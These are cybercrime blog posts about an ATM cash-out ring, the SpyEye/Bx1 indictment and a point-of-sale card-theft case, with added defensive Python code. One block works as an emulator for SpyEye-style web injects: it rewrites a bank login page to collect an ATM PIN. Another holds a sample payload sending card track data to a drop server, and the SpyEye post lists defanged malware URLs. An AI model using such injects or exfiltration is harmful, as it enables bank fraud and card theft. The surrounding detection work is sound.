Showing posts with label Indictments. Show all posts

Thursday, May 09, 2013

ATM Cashers in 26 Countries steal $40M

CBS News in New York has a video on their website this morning titled Cyber-attacks behind possibly record-breaking bank heist. Former FBI Assistant Director John Miller shares the story and says "We've learned how they carried out this cyber-attack, and it's unlike anything ever seen before."

Except it isn't. In fact, on Tuesday morning this week I was sharing a presentation about financial cyber crimes with Iberia Bank in New Orleans, LA. I mentioned that one of the things that banks still need to be on the lookout for is true "intrusions" into their system. By planting malware on internal bank systems, criminals can gain deep penetrating access to the internal workings of the bank and take their time, recruiting specialists to help them learn the inner workings of the bank to coordinate very elaborate schemes.

The attack described by Miller involves a group who had partnered together around the world calling themselves the "Unlimited Operation". In the scheme he describes, hackers gain internal access to a bank, or in the most recent case "a Visa/MasterCard processing Center," and gain the ability to manipulate the withdrawal limit on certain ATM Debit cards. These card numbers are then distributed around the world to "Cashing Gangs" that make local copies of the ATM cards and build a network of cashers who "work the machines."

One of the most notorious hacking operations in U.S. history was "Solar Sunrise", a deep penetration into the Pentagon's computer operations that served as a wake-up call for the U.S. Government and led to the production of a video, now available on YouTube, called "Solar Sunrise: Dawn of a New Threat".

The hacker mastermind behind Solar Sunrise was an Israeli hacker, Ehud Tenenbaum, who called himself The Analyzer. In September of 2008 we wrote about him on this blog in the story Is The Analyzer Really Back? (The return of Ehud Tenenbaum) because Tenenbaum was the mastermind behind an attack against a Calgary-based financial services company. In that case, Tenenbaum penetrated the company's internal systems and gained the ability to alter or remove the ATM withdrawal limits. Then, teams of cashers, armed with counterfeit ATM cards bearing the magnetic stripe information corresponding to those accounts, hit the streets withdrawing $2 Million dollars in a blitz of ATM-withdrawals.

But that's not the only time it happened. This blog also ran a story in November 2009 called The $9 Million World-Wide Bank Robbery that shared the details of exactly the same type of raid performed against RBS WorldPay, headquartered in Atlanta, Georgia. In that case, Estonian hackers penetrated the financial services company, which specializes in "Payroll Debit Cards". After doing so, they contracted with fellow criminals in Russia, Yevgeny Anikin and Viktor Pleshchuk, who have both confessed their crimes and received suspended sentences in the Russian bribery-based version of justice. (See article: Hacker escapes jail time in RBS WorldPay ATM heist.) Anikin and Pleshchuk worked with the famous credit card trading criminal BadB (Vladislav Horohorin) to build a network of cashers operating in 280 cities. Over the course of 12 hours, 2,100 ATM machines in 280 cities allowed more than $9 million in withdrawals against just 44 compromised payroll card accounts.

That doesn't mean cyber criminals can't go to jail though! Vladislav Horohorin was arrested in Nice, France as he prepared to return to Moscow. (See the Daily Mail story, One of world's most wanted cyber criminals caught on French Riviera.) Horohorin, or "BadB", was the founder of CarderPlanet, and was actually returned to the US, where he was tried and in April 2013 Sentenced to 88 Months in Prison.

For a look at one of the US-based casher rings in the RBS WorldPay case, we could also consider the case of Sonya Martin, a Nigerian woman, who ran the Chicago casher gang used in that case. Sonya's ring only withdrew $89,120 in Chicago, but she still got a 30 month sentence back in August 2012. See: Cell leader in RBS WorldPay fraud scheme sentenced.

One other case that used this methodology, and also had New York City ties, was the case that charged Ukrainians Yuriy Ryabinin and Ivan Biltse with performing $750,000 in ATM withdrawals. BankInfoSecurity.com reported the story in 2008, which documented that $5 million was withdrawn in more than 9,000 withdrawals "all around the world" on September 30th and October 1st of that year. According to an affidavit shared by Wired Magazine, this case was tied to a breach of a Citibank server that processed ATM withdrawals at 7-Eleven convenience stores.

In the current case described this morning by CBS, it was reported that later today Loretta Lynch, the U.S. Attorney for the Eastern District of New York, would announce the arrest of seven members of a New York casher gang that hit ATMs up and down Broadway for almost $2 million during the most recent "Unlimited Operation" case. "Unlimited" was also involved in a similar $5 million raid against a financial institution in India. CBS shared a graphic of the locations of the ATM machines used by the crew named in the indictment to be announced later today.

In the New York case, the indicted cashers were:

  • ALBERTO YUSI LAJUD-PEÑA, 23 (deceased)
  • JAEL MEJIA COLLADO, 23
  • JOAN LUIS MINIER LARA, 22
  • EVAN JOSE PEÑA, 35
  • JOSE FAMILIA REYES, 24
  • ELVIS RAFAEL RODRIGUEZ, 24
  • EMIR YASSER YEJE, 24
  • CHUNG YU-HOLGUIN, 22

The Eastern District of New York's Press Release, Eight Members of New York Cell of Cybercrime Organization Indicted in $45 Million Cybercrime Campaign, released today, May 09, 2013, explains the details of how the cashers above, who withdrew $2.8 million in New York, fit into the larger "Unlimited Operations." In the first operation, the New York crew withdrew $400,000 from 140 ATMs in New York City in two hours and 25 minutes. In the second operation, February 19-20, 2013, the crew performed 3,000 ATM withdrawals, scoring $2.4 million in cash between 3 PM on the 19th and 1:26 AM on the 20th, stealing about $240,000 per hour!

The worldwide take on the Feb 19-20 raid included 36,000 transactions and $40 million!
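A detection sketch, added here and not part of the original post, the indictment, or any issuer's or processor's code: the pattern above is visible in the issuer's own authorization log. Two checks catch it, and both are worth running. First, compare approved withdrawals against the limit the issuer believes is on file; an approved total above that limit means the limit the authorization host actually used is not the one on record, which is exactly what a tampered limit looks like. Second, count distinct ATMs per card in a short window; a legitimate cardholder does not hit ten machines in an hour. The card numbers, ATM identifiers, timestamps and thresholds below are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample data, not from the indictment. Card ...01 is an ordinary
# prepaid-debit customer; card ...02 is being "worked" by a casher crew after
# its withdrawal limit was tampered with at the processor.
ISSUER_DAILY_LIMIT = {
    "4000000000000001": 500.00,
    "4000000000000002": 500.00,   # the limit the issuer believes is in force
}

SAMPLE_AUTHS = [
    # (card, ISO timestamp, ATM id, city, amount approved)
    ("4000000000000001", "2013-02-19T10:02:00", "ATM-0101", "Queens", 200.00),
    ("4000000000000001", "2013-02-19T18:40:00", "ATM-0102", "Queens", 100.00),
] + [
    ("4000000000000002", f"2013-02-19T{15 + i // 20:02d}:{(i * 3) % 60:02d}:00",
     f"ATM-{2000 + i:04d}", "Manhattan", 800.00)
    for i in range(60)
]


def _load(auths):
    """Group authorizations by card, sorted by time."""
    by_card = defaultdict(list)
    for card, ts, atm, city, amount in auths:
        by_card[card].append({"ts": datetime.fromisoformat(ts), "atm": atm,
                              "city": city, "amount": float(amount)})
    for rows in by_card.values():
        rows.sort(key=lambda r: r["ts"])
    return by_card


def detect_unlimited_operations(auths, limits, *, limit_window=timedelta(hours=24),
                                velocity_window=timedelta(hours=1), max_atms_per_window=10):
    """Return one alert dict per (card, rule) that fires.

    "limit_exceeded": approved withdrawals inside limit_window exceed the limit the
    issuer has on file. Approved-but-over-limit is the signature of a tampered limit,
    because the authorization host would otherwise have declined.
    "atm_velocity": the card was used at >= max_atms_per_window distinct ATMs inside
    velocity_window, the footprint of a casher crew moving along a street.
    """
    alerts = []
    for card, rows in _load(auths).items():
        limit = limits.get(card)
        start = 0
        for end, row in enumerate(rows):
            while row["ts"] - rows[start]["ts"] > limit_window:
                start += 1
            total = sum(r["amount"] for r in rows[start:end + 1])
            if limit is not None and total > limit:
                alerts.append({"card": card, "rule": "limit_exceeded",
                               "detail": f"${total:,.2f} approved vs ${limit:,.2f} limit",
                               "at": row["ts"].isoformat()})
                break
        start = 0
        for end, row in enumerate(rows):
            while row["ts"] - rows[start]["ts"] > velocity_window:
                start += 1
            atms = {r["atm"] for r in rows[start:end + 1]}
            if len(atms) >= max_atms_per_window:
                alerts.append({"card": card, "rule": "atm_velocity",
                               "detail": f"{len(atms)} ATMs within {velocity_window}",
                               "at": row["ts"].isoformat()})
                break
    return alerts


def rules_fired(alerts):
    """Map card -> sorted list of rule names, convenient for tests and dashboards."""
    fired = defaultdict(set)
    for a in alerts:
        fired[a["card"]].add(a["rule"])
    return {card: sorted(rules) for card, rules in fired.items()}


if __name__ == "__main__":
    for alert in detect_unlimited_operations(SAMPLE_AUTHS, ISSUER_DAILY_LIMIT):
        print(alert)
```

The limit check only works if the reference limits come from a copy the attacker could not reach (a nightly export to the fraud team's own store, for instance); if the detector reads the same record the intruder edited, both agree and nothing fires. That is the practical lesson of the cases above: the processor's authorization host believed the new limit.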

Alberto Yusi Lajud-Peña, the leader of the New York casher ring, laundered the cash, in one case depositing 7,491 $20 bills in a single transaction in Miami, Florida. The crew bought and sold "portable luxury goods" with the cash, including luxury watches and cars, including a Mercedes SUV and a Porsche Panamera valued at $250,000 between the two. Alberto, also known as "Prime" online, was murdered in the Dominican Republic sometime after these robberies occurred.

U.S. Attorney Lynch says that law enforcement authorities in Japan, Canada, Germany, and Romania made great contributions in the case, but that they also received cooperation from the authorities in the UAE, Dominican Republic, Mexico, Italy, Spain, Belgium, France, United Kingdom, Latvia, Estonia, Thailand, and Malaysia.

What these cases are intended to demonstrate is the importance of closely monitoring the internal corporate network for signs of a breach. In a presentation at ITWeb Security Summit this week, "Formulating an attack-focused security plan", Mandiant CSO Richard Bejtlich shares that 75% of break-ins happen through someone clicking on or responding to a malicious email, and that in two-thirds of incidents the breach isn't discovered by the company but is reported by a third-party organization. Bejtlich says that by the time the attacker is discovered "they will have been inside your company for around eight months."

That's what Malcovery's Today's Top Threats report is intended to address. Which Top Threat email is going to lead to criminals having control of one or more of your internal employees' machines? It takes time for the criminal to learn enough about your organization's internal workings to find and alter the withdrawal limits on a set of cards. Quick detection of the breach is key to preventing problems like those described above.

Wednesday, May 08, 2013

SpyEye Botherder BX1 - welcome to Georgia!


The BX1 Indictment

(Click to download the Bx1 Indictment) Northern District of Georgia (Atlanta)

Criminal Docket for Case#: 1:11-cr-00557-UNA-1 (filed 12/20/2011)

Counts:

(1) 18:1349 Attempt and Conspiracy to Commit Mail Fraud
(2-11) 18:1343 & 2 – Fraud by Wire, Radio, or Television
(13) 18:1030(a)(5)(A), 1030(c)(4)(B) – Fraud Activity Connected with Computers
(14-23) 18:1030(a)(2)(C), 1030(c)(2)(B)(i) – Fraud Activity Connected with Computers

From December 2009 to September 2011 [Redacted] and Hamza Bendelladj, AKA Bx1 conspired to … defraud financial institutions and individuals and obtain money and property from them by means of materially false and fraudulent pretenses, representations and promises, as well as omission of material facts, including moneys, funds, credits, assets, and other properties.

The indictment defines and describes botnets, and describes SpyEye as having the capability to "facilitate the theft of confidential personal and financial information by numerous examples including a data grabber or keystroke logger, and at times by presenting a fake bank web page or portions of a bank web page to trick a user into entering personal information."

(The principal author of SpyEye is redacted in the published Indictment). Bx1 is listed as a co-conspirator who helped develop SpyEye components. The behavior of SpyEye is described in great detail, including the creation and deployment of particular Web Injects and how they behave.
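To make "web inject" concrete, here is an added example; it is not code from the indictment, from SpyEye, or from the blog author. It uses the publicly documented Zeus/SpyEye-style inject config layout (set_url, data_before, data_inject, data_after, data_end) as an assumption about the format; the bank URL, the login page and the field names are constructed. The first half shows what the bot does in the victim's browser: it rewrites the bank's own login page so that an extra "ATM PIN" box appears under the real password field, which is how "portions of a bank web page" are faked without the URL or certificate changing. The second half shows the check a bank can run on its side: compare the input names it actually served against what comes back.

```python
import fnmatch
import re
from html.parser import HTMLParser

# Constructed inject rule in the Zeus/SpyEye-style config layout (an assumption
# about the format; bank URL and field names are made up). It asks for an
# "ATM PIN" right after the real password box on the bank's login page.
INJECT_CONFIG = """\
set_url https://www.examplebank.test/login* GP
data_before
<input type="password" name="password"*>
data_end
data_inject
<br>ATM PIN: <input type="text" name="atm_pin">
data_end
data_after
data_end
"""

# Constructed stand-in for the page the bank actually serves.
BANK_LOGIN_PAGE = """\
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password" autocomplete="off">
  <input type="submit" value="Log in">
</form>
"""


def parse_inject_config(text):
    """Parse set_url / data_before / data_inject / data_after / data_end blocks."""
    rules, current, section, buf = [], None, None, []
    for line in text.splitlines():
        if line.startswith("set_url "):
            parts = line.split()
            current = {"url_mask": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                       "data_before": "", "data_inject": "", "data_after": ""}
            rules.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line, []
        elif line == "data_end" and section is not None:
            current[section] = "\n".join(buf)
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def _mask_to_regex(mask):
    # In inject patterns '*' is a wildcard; everything else is literal text.
    return ".*?".join(re.escape(part) for part in mask.split("*"))


def apply_webinjects(url, html, rules):
    """What the bot does inside the browser: rewrite the page before it renders."""
    for rule in rules:
        if not rule["data_before"] or not fnmatch.fnmatch(url, rule["url_mask"]):
            continue
        pattern = _mask_to_regex(rule["data_before"])
        if rule["data_after"]:
            pattern += "(?=.*?" + _mask_to_regex(rule["data_after"]) + ")"
        m = re.search(pattern, html, flags=re.DOTALL)
        if m:
            html = html[:m.end()] + rule["data_inject"] + html[m.end():]
    return html


def input_names(html):
    """Names of <input> fields in an HTML fragment, in document order."""
    names = []

    class _Collector(HTMLParser):
        def handle_starttag(self, tag, attrs):
            if tag == "input":
                names.extend(v for k, v in attrs if k == "name" and v)

    _Collector().feed(html)
    return names


def unexpected_fields(template_html, observed_html):
    """Defensive check: input names the bank never put on its page.

    A bank can run the same comparison against the parameter names in the POST it
    receives; "atm_pin" arriving at /login is a strong sign of a client-side inject.
    """
    return sorted(set(input_names(observed_html)) - set(input_names(template_html)))


if __name__ == "__main__":
    rules = parse_inject_config(INJECT_CONFIG)
    tampered = apply_webinjects("https://www.examplebank.test/login", BANK_LOGIN_PAGE, rules)
    print(tampered)
    print("unexpected fields:", unexpected_fields(BANK_LOGIN_PAGE, tampered))
```

Because the rewrite happens after TLS is terminated in the browser, neither the padlock nor the address bar changes; the only party positioned to notice is the bank, by rejecting form submissions that carry parameters it never asked for, or by instrumenting its pages to report the field set the browser actually rendered.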

Bx1 communicated through email, instant messaging programs, and web forums to discuss purchasing, updating, customizing, developing components for, and pricing SpyEye, as well as aspects of operating SpyEye components.

From at least February 21, 2011 through February 24, 2011, at least one of Bx1's C&C servers was located in Atlanta, Georgia, distributing configs that targeted 253 unique financial institutions.

Counts 2 through 11 of the indictment trace particular infections that could be documented through the logs of the Atlanta-based server and which led to confirmed financial losses of particular victims in California, North Carolina, New York, and Virginia.

Count 12 names particular websites used by Bx1 for his advertising, including the website www.darkode.com, where particular messages in January, June, July, and September 2010 are cited. The June post discussed "Form Grabbing", while an update in September introduced the ability to scan all controlled bots for credit card credentials. In April 2011, the YouTube user "danielhb1988" called himself Bx1 and claimed to be selling SpyEye in a video advertised on that site. In July 2011, an undercover law enforcement officer purchased SpyEye from Bx1 for $8,500, receiving his purchased code from www.sendspace.com.

Counts 14 through 23 document particular examples of the SpyEye server at 75.127.109.16 communicating with protected computers.

The Atlanta Server

During the time period stated in the indictment, the IP address indicated was known to be distributing malware from the hostile URL (spaces added for safety):

www . 100myr . com / cp / bin / exe . exe

www . 100myr . com / cp / gate . php ? guid = (infected machine configuration report stuff here)

That server was hosted at Global Network Access (gnax.net) in Atlanta.

The domain was registered January 20, 2011 on Joker.com by random68@live.com

That same email address was used to register the domain "bx1.biz"

Sunday, August 12, 2012

Carder Christopher Schroebel gets Seven Years

21 years old and thinking about Cybercrime as a career choice?  Think again.  Seattle-based U.S. Attorney Jenny Durkan told a press conference back on June 11, 2012 "People think that cybercriminals cannot be found or apprehended.  Today we know that's not true.  You cannot hide in cyberspace.  We will find you.  We will charge you.  We will extradite you and we will prosecute you." (see: MSNBC: Feds Arrest Alleged Credit Card Fraud Kingpin.) 

Christopher A. Schroebel


Durkan seems to be standing true to her word. On Friday her office secured a seven-year prison sentence for Christopher A. Schroebel, a 21-year-old man from Maryland.

The "Official" complaint against Schroebel says that on a date before July 20, 2011 and continuing until August 3, 2011 Schroebel was stealing information from Mondello's Italian Restaurant,  specifically the data from credit cards belonging to K.H., K.W., J.H., V.D., S.J., and M.H..  That gives us the first charge - Obtaining Information From a Protected Computer.

An interview in the Seattle Times explains what Schroebel did from the perspective of Corino Bonjrada, the owner of Mondello Ristorante Italiano. Schroebel had planted spyware in the Point of Sale terminals of dozens of businesses. Bonjrada told the Times "Some of my customers were saying they didn't know if they wanted to come back. They were afraid." Some of the customers were hit with fraudulent charges "within 10 minutes" of swiping their cards at his restaurant. (See: Dutch man charged with stealing Washington credit cards.)
  
Schroebel was arrested last November in possession of over 84,000 stolen or purchased credit card data stripes and made his first court appearance November 21, 2011. At that time he was released to an inpatient substance abuse program, and was released from that program on December 26, 2011. He was picked up and arrested again on a local warrant, and ordered detained as a flight risk on January 24, 2012. So he has already been in custody for nearly eight months at this point. (The detention order is available at archive.org.)

Schroebel entered a plea agreement on May 15, 2012,  and was held pending his August 10, 2012 sentencing.  (See: PACER case number; 180519, Docket 2:2011-cr-00391-RSM.)


The Seattle Police Department describes it a bit better:

The SPD has been actively investigating unauthorized computer intrusions ("hacks") into the computer systems of small businesses located in the Western District of Washington (including Mondello's Italian Restaurant in Magnolia and Seattle Restaurant Store in Shoreline).


The person/s responsible for the hacks installed malicious software ("malware") on the computer systems of the victim businesses. The malware was designed to, and has collected credit card account numbers belonging to customers/clients of the victim businesses. The stolen credit card account numbers were then transmitted over the Internet to a computer server under the control of the hacker/s and/or their associates.
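An added example of the detection side of what the affidavit describes; this is not the SPD's, the Secret Service's, or Schroebel's code. Track 1 and Track 2 magnetic-stripe data have a fixed layout (a Track 1 record starts with %B, a Track 2 record with a semicolon, and both carry the PAN and a YYMM expiry in fixed positions), so a sensor on the egress of a POS network can spot card data leaving in the clear and use a Luhn check to suppress order numbers and other digit runs. The outbound payload, host and path below are constructed; the card numbers are industry test PANs.

```python
import re

# Constructed outbound payload, the kind of thing a POS RAM scraper posts to its
# drop server. Card numbers are industry test PANs; the 16-digit "order" number is
# a decoy that fails the Luhn check. Host and path are made up.
SAMPLE_EXFIL = (
    b"POST /gate.php HTTP/1.1\r\nHost: 203.0.113.10\r\n\r\n"
    b"id=POS-07&data="
    b"%B4111111111111111^DOE/JOHN^1512101000000000000000?"
    b";5500000000000004=15121010000000000000?"
    b"&note=order 1234567890123456 total 42.17"
)

# Magnetic-stripe layouts: Track 1 starts %B, fields separated by ^, ends with ?;
# Track 2 starts ;, then PAN = expiry(YYMM) service-code discretionary-data ?.
TRACK1_RE = re.compile(r"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})(\d{3})?([^?]*)\?")
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{4})(\d{3})?([^?]*)\?")
BARE_PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def luhn_ok(pan):
    """Luhn mod-10 check; filters out order numbers, timestamps and other digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep BIN and last four, the form a fraud analyst can work with safely."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(payload):
    """Return findings for track data and Luhn-valid bare PANs in an outbound payload."""
    text = payload.decode("latin-1")   # track data is 7-bit; never fail on stray bytes
    findings, seen = [], set()
    for m in TRACK1_RE.finditer(text):
        pan, name, expiry = m.group(1), m.group(2), m.group(3)
        seen.add(pan)
        findings.append({"format": "track1", "pan_masked": mask_pan(pan),
                         "name": name, "expiry": expiry, "luhn": luhn_ok(pan)})
    for m in TRACK2_RE.finditer(text):
        pan, expiry = m.group(1), m.group(2)
        seen.add(pan)
        findings.append({"format": "track2", "pan_masked": mask_pan(pan),
                         "expiry": expiry, "luhn": luhn_ok(pan)})
    # Lower-confidence: a bare 13-19 digit run that passes Luhn and was not already
    # seen inside a track record.
    for m in BARE_PAN_RE.finditer(text):
        pan = m.group(0)
        if pan not in seen and luhn_ok(pan):
            seen.add(pan)
            findings.append({"format": "bare_pan", "pan_masked": mask_pan(pan), "luhn": True})
    return findings


if __name__ == "__main__":
    for finding in find_track_data(SAMPLE_EXFIL):
        print(finding)
```

A POS terminal has no business sending track data anywhere but its payment processor, so even one such finding on a connection to an unknown host is worth an alarm. Scrapers that encrypt or encode the stolen data before posting it will evade this check; for those, the destination (a host the terminal has never spoken to, as in the Atlanta drop server in the SpyEye case above) is the stronger signal.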

USSS ECTF/NCFI Success Story


That's from the affidavit of a SPD Computer Forensics Detective, David Dunn.  He is a member of the USSS Electronic Crimes Task Force, Seattle Field Office.  The Secret Service partners with local police departments all across the country to share their Computer Forensics capability in the form of free training and expertise to help work these cases.  Part of that training is right here in Hoover, Alabama at the National Computer Forensics Institute.  (David actually responded to this post, giving permission to share his name, and confirming that he took AFT (Advanced Forensics Training) and NITRO (Network Intrusion Response) courses at the National Computer Forensics Institute in Hoover.)

Listen to the training and experience this detective got by being a local law enforcement member of the USSS Electronic Crimes Task Force.

In April of 2005, I was transferred to the Seattle Police Department Fraud unit as a Computer Forensic Detective.  I am currently, and since October of 2006 have been assigned as a full time member of the USSS Electronic Crimes Task Force, Seattle Field Office.  I hold a Special Deputation appointment through the United States Marshals Service that permits me to seek and execute arrest and search warrants supporting a federal task force.  As a member of the Seattle USSS E-Crimes Task Force, I investigate violations of federal law in the state of Washington that fall under the responsibility of the USSS, with an emphasis on crimes involving computers, the Internet, and electronic communications.

(...Many local training courses listed, and then... )
My training and experience also specifically includes training and experience regarding computer and network intrusions, commonly known as "hacking."  This includes completion of the 40 hour "Incident Handling and Response" course on network intrusions and incident response through the Department of Homeland Security.  I have experience with packet analysis, malware, and viruses.  I am a Certified Ethical Hacker.  I have attended 104 hours of training in Network Intrusion Response at the National Computer Forensic Institute.  I hold the following certifications: EnCase Certified Examiner, Access Data Certified Examiner, IACIS Computer Forensic Certified Examiner.  I have received advanced training in both network intrusion forensics as well as Point of Sale forensic investigations.

As a member of the USSS ECrimes Task Force, I have worked on numerous computer and network intrusion cases. These cases have involved a range of hacker techniques and modus operandi, including social engineering, SQL injection attacks, botnet attacks, malware infections and various other means of computer infection and attack. I have examined myriad server logs and volumes of IP address information as part of my investigation of various hacking cases. I have also created and examined forensic images of dozens of infected and hacked computers and servers. I have investigated cyber cases involving both national and international victims and suspects. As a result, I am familiar with schemes involving large scale Internet crimes and network attacks.



(Here's a picture with my summer students from the National Science Foundation Research Experience for Undergraduates at the NCFI - sorry - shameless plug - I think this place is great!)





Back to the Hacking Charges



The Complaint then says that "knowingly and with the intent to defraud, trafficked in and used credit card track data from credit card accounts belonging to (the above) without their knowledge or consent, and by such conduct obtained profits aggregating $1,000 or more, said trafficking affecting interstate and foreign commerce, in that the credit card account numbers that were so trafficked and used by Schroebel and others to make fraudulent purchases in states outside the State of Washington."  That's the second charge - Access Device Fraud.

When Schroebel was arrested, he was in possession of 84,000 credit card numbers that he had stolen or bought from other hackers.

When the SPD investigated the fraudulent charges made on the cards of Mondello's customers, the trail led to California. One of the cards, belonging to K.H., was used at Home Depot, Wal-Mart, Jack in the Box, and several other locations. V.D. and S.J. dined together at Mondello's on July 30, 2011, and BOTH had their cards used for fraudulent purchases in Southern California on July 31, 2011.

That's where we get to the next interesting member of our trio, GUERILLA BLACK.

GUERILLA BLACK, MRBUSINESSMAN62, BLACKDOLLA, Charles Tony Williamson



(click for press release)

The Indictment of Guerilla Black fills in the California end of the story.



Guerilla Black is described as a "B.I.G. look-alike" (or some would say imitator). Apparently the record sales needed a bit of supplement to help him live the private jets and limos image he attempted to maintain in his YouTube videos. (Shown above is the track "Compton".)

From at least January 2011 credit cards stolen by Schroebel were showing up in California, being used by Guerilla Black and his crew.  Black's indictment shows many entries such as:

19. On or about February 9, 2011, the coconspirator who hacked the point of sale computer system at the Shoreline, WA business sent an e-mail to CHARLES TONY WILLIAMSON, that contained multiple customer credit card numbers that were stolen through the hack of that business, including at least one credit card number that had been issued by Boeing Employees' Credit Union.

or

32. On or about July 31, 2011, the coconspirator who hacked the point of sale computer system at the Seattle, WA restaurant sent an e-mail to CHARLES TONY WILLIAMSON, that contained multiple customer credit card numbers that were stolen through the hack of that business, including at least two credit card numbers that had been issued by Boeing Employees' Credit Union.


 (Gee, which two would those be?)

The indictment lays out that Williamson "expressed his preference and desire to coconspirators to buy 'dumps' of stolen credit card numbers 'in bulk,' that is, in lots of at least 100, or 500, or more."  and that he "expressed his preference and desire...to obtain credit card numbers that were 'freshly' stolen through 'point of sale system' computer network intrusions rather than card numbers that were skimmed or stolen from credit card databases compiled by others, because the 'fresh' card numbers stolen from point of sale system hacks could be used more successfully for fraudulent transactions."

Williamson "redistributed the stolen card numbers to a network of criminal associates, with the intent and the expectation that these associates would then use the stolen credit card numbers for fraudulent transactions."

But Williamson wasn't the only one Schroebel was selling to . . .


Schrooten / Fortezza


As it turns out, Schroebel would sell the cards he acquired from these POS terminals to another 21 year old, Dutch national David Benjamin Schrooten, who ran a website that sold credit cards to others for their use.

Schrooten will be well-known under his hacker name "Fortezza" to anyone who follows the excellent blog KrebsOnSecurity.com.  Krebs story Feds Arrest Kurupt Carding Kingpin tells us more about the English language carding site run by Fortezza called Kurupt.su.  According to Krebs, Fortezza gained many of his cards by breaking in to a competing carding site.  In retaliation, THOSE carders posted a message announcing that Fortezza "needs to learn not to fuck with Russians !!!" and providing his information, including real name, city, home address, shipping address, telephone number, and fax number.

Krebs has a screen shot of the post on his blog:



Schrooten was arrested as he got off a plane in Romania, and later extradited to the United States. He will be tried in September in Seattle.


(click for press release)


According to the Schrooten indictment (also from KrebsOnSecurity) Schrooten is charged with Conspiracy to Commit Access Device Fraud and Bank Fraud, 2 counts of Access Device Fraud, 5 counts of Bank Fraud, 1 count of Intentional Damage to a Protected Computer, and 5 counts of Aggravated Identity Theft.

As we've discussed before, one of the ways our judicial system is not geared up for handling international cybercrime is that wherever these cases are tried, they address only the charges LOCAL TO THAT JURISDICTION. So, in this case, the trial is in Seattle, which means the only victims who can be named are those with a connection to the Western District of Washington. In particular, this trio of cases focuses on the charge that the Boeing Employees' Credit Union, and members of the credit union who reside in the Western District of Washington, had money stolen by these criminals. So the counts of Bank Fraud against Schrooten specifically refer to transactions on April 25, 2011, August 20, 2011, December 21, 2011, and two on February 1, 2012, where the account holder was a BECU customer who lived within the jurisdiction of this court.



There will likely be more arrests, and more sentences, in this case in the near future.  I wanted to share it now though because it is a great example of what happens when a smart local detective partners with the USSS Electronic Crimes Task Force, and runs down a local crime, along with its international implications.